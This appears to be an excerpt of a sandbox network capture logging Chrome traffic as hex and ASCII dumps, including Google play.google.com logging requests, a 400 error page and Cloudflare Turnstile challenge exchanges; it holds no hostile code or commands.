                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                                                                                                                                                                                                  Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: BBBBBBF!4I
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: $'


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  48192.168.2.1649807142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC1345OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 341
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  X-Goog-AuthUser: 0
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://accounts.google.com
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC341OUTData Raw: 1f 8b 08 00 00 00 00 00 00 0a e5 94 4d 4b c3 40 10 86 ff 8a ec 79 9b cc ec 66 bf 2a 1e d4 83 37 2f 45 3c 6c 72 28 ed 9a 06 da 8d e4 43 fd f9 4e d2 16 c1 af 46 4f 82 2c 0c e1 dd 99 97 77 1e c2 7a 8f 3c f6 db ed e4 e2 3f 13 59 88 b3 bb 05 fb d0 eb 3d bb a9 eb 72 1b ce ae 37 4d bd 0b 8c 33 44 c3 0a ee d9 6d dd 9d 5f 5e 5c 35 cb b8 26 d5 8e da d8 54 f5 bb 63 5b c1 81 b3 fb 2a ae eb e7 76 d0 20 a1 43 1f 2f 56 53 dd 77 91 a4 9c b4 09 4a 31 78 64 34 32 9e 82 a6 95 b2 94 81 a1 91 99 52 80 c2 01 c0 87 90 ef 57 f1 fb 0d 89 4b ce 96 ab 55 dd c7 ae 4d ca 71 8b 64 55 ef d2 27 99 b6 55 19 ab 98 56 eb 10 bb ea a1 0a 4d 7e 70 f5 39 db 74 dd 63 3b 4f 53 29 92 d0 94 61 19 43 d2 f4 69 4e d9 28 12 59 ce 24 a0 05 6d ac 41 a3 a5 13 26 c3 8c c6 e5 01 6c ce 16 28 10 c0 a2 d4 38
                                                                                                                                                                                                                                  Data Ascii: MK@yf*7/E<lr(CNFO,wz<?Y=r7M3Dm_^\5&Tc[*v C/VSwJ1xd42RWKUMqdU'UVM~p9tc;OS)aCiN(Y$mA&l(8
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC499INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:04 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  49192.168.2.1649808142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC681OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=CvBdONSJlOTXnPiCO4EuPPFwvm0EaFxj7trDUyhNNdFc6G_FN1wH_QPEbYiZW0zQgkXFtiKQ0CKMDykCIwoc1fzoCwzEPxrgu2FWeoTKNu9NzfggmrBkrEfHI_tjT5TooUS_woqpRCCLaM_geIXvbdzesLAux08s102TrUKtXHfaEykl1Gw9Z1ln7n90-KkG
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC270INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:04 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  Content-Length: 1555
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC1120INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC435INData Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e
                                                                                                                                                                                                                                  Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  50192.168.2.1649809104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 33485
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  CF-Challenge: ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC16384OUTData Raw: 76 5f 38 66 34 31 38 65 65 30 38 62 66 61 34 31 66 38 3d 54 64 73 5a 36 68 35 39 47 4f 64 35 47 37 39 35 72 49 6e 49 6c 37 75 49 25 32 62 49 6f 49 65 42 68 31 35 70 49 68 42 6f 47 49 24 49 70 78 66 42 42 68 45 35 37 49 34 76 7a 49 35 47 42 49 6a 49 73 32 6f 75 75 75 41 68 49 68 52 49 44 32 59 4b 6f 75 49 59 75 46 49 37 42 68 4f 35 49 4b 43 7a 50 62 49 59 4a 45 49 46 5a 68 6d 47 6d 49 68 32 49 4f 2b 61 32 59 68 49 35 24 75 49 4e 33 49 4f 7a 4b 72 52 5a 6f 31 6c 37 36 54 35 49 76 47 49 6e 24 49 44 62 42 49 53 49 6f 62 49 37 32 49 4a 65 42 35 4a 6d 4b 68 56 33 5a 35 74 4f 33 32 47 4e 6b 36 75 31 36 75 6d 45 62 36 32 79 42 31 49 6d 43 47 49 52 56 42 44 4b 4f 31 49 35 45 48 42 46 2b 66 34 49 59 62 76 51 2b 75 68 78 76 33 43 51 47 35 54 4f 6c 63 56 6f 30 6e 72
                                                                                                                                                                                                                                  Data Ascii: v_8f418ee08bfa41f8=TdsZ6h59GOd5G795rInIl7uI%2bIoIeBh15pIhBoGI$IpxfBBhE57I4vzI5GBIjIs2ouuuAhIhRID2YKouIYuFI7BhO5IKCzPbIYJEIFZhmGmIh2IO+a2YhI5$uIN3IOzKrRZo1l76T5IvGIn$IDbBISIobI72IJeB5JmKhV3Z5tO32GNk6u16umEb62yB1ImCGIRVBDKO1I5EHBF+f4IYbvQ+uhxv3CQG5TOlcVo0nr
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC16384OUTData Raw: 63 59 50 5a 31 49 59 32 6f 43 24 24 4f 73 4f 55 2d 58 71 6f 42 44 49 72 49 73 5a 37 42 49 55 49 75 49 49 73 49 51 5a 48 32 75 44 49 51 49 35 32 59 74 62 6d 49 35 32 4f 57 5a 4c 49 62 46 37 6d 35 70 56 38 5a 75 75 35 62 49 39 42 37 4e 5a 6a 49 70 42 37 44 35 74 49 2b 5a 68 45 35 4c 49 70 45 6f 51 4d 78 49 65 32 59 46 35 6f 49 37 73 48 39 35 34 59 37 33 4f 57 5a 6d 64 4c 5a 49 47 68 56 49 33 5a 70 57 5a 65 49 79 5a 54 47 59 33 49 66 5a 4b 6d 68 79 49 56 5a 6b 47 59 72 49 57 5a 33 6d 68 4b 49 53 5a 33 64 59 52 49 4d 5a 4a 64 68 4e 49 32 42 62 64 59 2d 49 31 42 33 75 68 52 49 45 42 4b 75 68 56 49 5a 42 62 31 68 7a 49 69 42 33 31 68 70 49 30 42 54 31 59 50 49 56 42 70 44 59 57 49 67 42 73 44 59 74 49 2d 42 6b 31 68 6d 71 70 73 6f 68 6d 48 63 24 71 32 6d 68 52
                                                                                                                                                                                                                                  Data Ascii: cYPZ1IY2oC$$OsOU-XqoBDIrIsZ7BIUIuIIsIQZH2uDIQI52YtbmI52OWZLIbF7m5pV8Zuu5bI9B7NZjIpB7D5tI+ZhE5LIpEoQMxIe2YF5oI7sH954Y73OWZmdLZIGhVI3ZpWZeIyZTGY3IfZKmhyIVZkGYrIWZ3mhKISZ3dYRIMZJdhNI2BbdY-I1B3uhRIEBKuhVIZBb1hzIiB31hpI0BT1YPIVBpDYWIgBsDYtI-Bk1hmqpsohmHc$q2mhR
                                                                                                                                                                                                                                  2024-12-18 19:29:04 UTC717OUTData Raw: 48 6e 4d 6f 31 63 65 66 31 65 50 46 4a 39 75 57 49 51 68 57 49 5a 49 36 68 68 33 35 39 44 6c 49 69 39 33 54 5a 57 69 53 32 35 4b 50 6c 45 7a 42 35 30 50 55 73 67 33 47 24 49 6b 6d 6d 54 4e 39 74 33 30 41 32 35 6c 62 69 65 7a 67 41 64 49 33 5a 35 62 35 38 4c 46 59 50 74 4e 47 4b 58 36 50 33 6e 5a 4d 5a 4e 6b 73 2b 57 42 61 49 59 78 4b 62 73 37 42 37 57 35 6c 5a 4b 64 37 67 6a 7a 42 37 31 55 4e 75 4f 42 65 64 68 4d 44 39 30 61 56 46 49 78 50 73 4e 6d 69 45 35 24 30 73 5a 37 67 5a 51 49 34 30 51 4d 35 41 6a 50 58 73 24 68 42 4c 58 6d 54 37 6b 6e 42 67 41 4f 6e 6e 6f 66 51 74 6c 70 65 43 72 4e 73 7a 49 43 75 49 33 32 49 6c 6c 2b 4f 59 44 4a 38 69 4c 6c 51 32 37 4d 64 2b 6c 2d 30 79 71 50 6c 5a 6f 67 47 53 55 73 47 70 6a 50 32 24 71 5a 35 6d 44 38 69 35 5a 79
                                                                                                                                                                                                                                  Data Ascii: HnMo1cef1ePFJ9uWIQhWIZI6hh359DlIi93TZWiS25KPlEzB50PUsg3G$IkmmTN9t30A25lbiezgAdI3Z5b58LFYPtNGKX6P3nZMZNks+WBaIYxKbs7B7W5lZKd7gjzB71UNuOBedhMD90aVFIxPsNmiE5$0sZ7gZQI40QM5AjPXs$hBLXmT7knBgAOnnofQtlpeCrNszICuI32Ill+OYDJ8iLlQ27Md+l-0yqPlZogGSUsGpjP2$qZ5mD8i5Zy
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:29:05 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 4544
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cf-chl-out: uHUmNiy5D+oY3f51+yX787AoftFpl8O6KDWwTRgXmbtYDrX88cMJcYayxKVs9EZsv7KvCT63/OmspVkfRc3QZAbykt0LbuGfUHUf3RNJEbC8Q85hMCbKCwo=$zuyPXWbFYuAqOs2w
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC1247INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 2f 34 53 69 66 6e 31 41 6c 67 5a 4c 33 55 4c 55 4e 31 66 45 73 54 76 6e 41 44 55 34 38 57 46 4f 6b 49 73 64 50 57 71 2b 44 65 6d 56 6a 51 54 67 74 53 6d 76 68 4a 30 79 63 42 39 37 51 30 78 50 33 2f 6e 35 61 2f 64 77 6a 49 70 64 65 4e 65 44 7a 50 42 56 63 46 77 49 64 6a 4b 65 51 6e 34 2b 4f 71 42 4e 34 55 6b 64 4d 2f 6d 57 34 74 46 4b 42 4f 33 4a 56 58 4c 6a 4a 32 42 70 70 5a 43 49 46 35 4c 38 30 6f 72 79 62 79 39 39 54 4a 61 52 43 56 64 69 72 6d 30 43 77 36 56 70 32 6d 44 7a 45 48 47 4b 55 6f 7a 46 54 44 54 46 5a 7a 62 78 6c 4f 73 76 46 65 45 42 57 4d 72 4f 69 59 62 38 36 62 50 65 44 49 36 6c 76 52 47 52 47 47 32 49 49 6d 6d 77 55 6c 6b 46 66 6e 79 44 6e 4c 49 6d 32 58 62 68 77 4d 4a 6d 52 7a 47 31 78 5a 57 4e 4e
                                                                                                                                                                                                                                  Data Ascii: cf-chl-out-s: /4Sifn1AlgZL3ULUN1fEsTvnADU48WFOkIsdPWq+DemVjQTgtSmvhJ0ycB97Q0xP3/n5a/dwjIpdeNeDzPBVcFwIdjKeQn4+OqBN4UkdM/mW4tFKBO3JVXLjJ2BppZCIF5L80oryby99TJaRCVdirm0Cw6Vp2mDzEHGKUozFTDTFZzbxlOsvFeEBWMrOiYb86bPeDI6lvRGRGG2IImmwUlkFfnyDnLIm2XbhwMJmRzG1xZWNN
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC1205INData Raw: 58 5a 46 79 54 6d 46 6f 6c 57 65 4b 61 35 56 70 6a 35 39 2b 63 36 4e 67 6d 31 31 33 71 58 6d 66 65 70 32 64 70 36 61 67 6e 4a 47 30 73 59 53 65 64 4a 65 34 69 5a 6c 38 62 35 65 4e 6d 5a 32 63 6b 5a 32 68 6e 70 4b 52 75 35 75 56 6c 4b 61 45 6d 63 61 48 78 4c 32 78 6c 63 69 33 74 71 36 52 73 70 57 34 32 37 53 64 6b 35 6a 41 72 39 65 6d 76 2b 6e 69 77 5a 32 36 6f 36 44 69 7a 2b 58 4e 35 75 72 54 77 63 4b 79 32 50 66 70 36 39 6e 4a 7a 4d 76 63 75 4c 55 44 33 4d 4c 54 43 4f 50 68 39 67 6d 2f 31 39 33 6e 42 4f 2f 67 33 52 44 68 35 50 48 31 36 65 50 30 38 2f 55 4c 39 75 48 59 36 79 54 31 38 64 6b 59 42 52 38 6b 43 53 48 32 2b 42 77 74 4c 4f 55 75 44 2b 77 6c 44 41 76 32 38 78 73 35 2b 2f 63 57 4c 79 77 45 4f 41 51 39 51 78 39 44 46 43 5a 4e 50 43 63 35 4d 51 6f
                                                                                                                                                                                                                                  Data Ascii: XZFyTmFolWeKa5Vpj59+c6Ngm113qXmfep2dp6agnJG0sYSedJe4iZl8b5eNmZ2ckZ2hnpKRu5uVlKaEmcaHxL2xlci3tq6RspW427Sdk5jAr9emv+niwZ26o6Diz+XN5urTwcKy2Pfp69nJzMvcuLUD3MLTCOPh9gm/193nBO/g3RDh5PH16eP08/UL9uHY6yT18dkYBR8kCSH2+BwtLOUuD+wlDAv28xs5+/cWLywEOAQ9Qx9DFCZNPCc5MQo
                                                                                                                                                                                                                                  2024-12-18 19:29:05 UTC1369INData Raw: 4e 6b 64 44 74 7a 63 32 51 4d 53 48 50 33 69 45 69 41 70 42 41 77 76 4b 2b 34 79 4d 67 59 4d 4e 54 63 30 42 42 50 31 44 68 51 33 50 42 55 4d 4d 6b 45 5a 50 76 77 41 43 45 6f 44 43 77 6b 6f 4b 45 77 6b 4a 46 41 4e 45 7a 51 77 56 78 67 6f 4d 78 5a 58 56 52 6f 57 4e 54 67 64 57 54 6f 6a 48 57 52 6a 55 55 73 6a 4c 46 35 74 5a 55 52 75 54 43 31 78 5a 57 41 78 64 44 4d 7a 63 47 63 36 61 7a 74 54 64 57 74 36 56 34 4a 64 66 46 78 6f 56 49 68 67 5a 45 6d 4d 66 49 70 75 54 6b 70 77 68 49 78 74 6d 56 6d 53 63 6d 65 49 57 5a 6d 69 57 6d 42 6a 59 6d 42 6c 6f 70 36 6d 5a 47 79 71 61 47 79 62 6d 70 4f 77 6e 32 74 76 64 6f 32 4d 70 4c 69 34 6b 4a 46 35 66 37 36 39 67 35 6d 35 74 48 36 31 6b 34 44 47 67 72 57 4d 69 63 6e 47 71 6f 57 72 76 5a 58 53 6c 36 76 46 30 4c 4b 6f
                                                                                                                                                                                                                                  Data Ascii: NkdDtzc2QMSHP3iEiApBAwvK+4yMgYMNTc0BBP1DhQ3PBUMMkEZPvwACEoDCwkoKEwkJFANEzQwVxgoMxZXVRoWNTgdWTojHWRjUUsjLF5tZURuTC1xZWAxdDMzcGc6aztTdWt6V4JdfFxoVIhgZEmMfIpuTkpwhIxtmVmScmeIWZmiWmBjYmBlop6mZGyqaGybmpOwn2tvdo2MpLi4kJF5f769g5m5tH61k4DGgrWMicnGqoWrvZXSl6vF0LKo
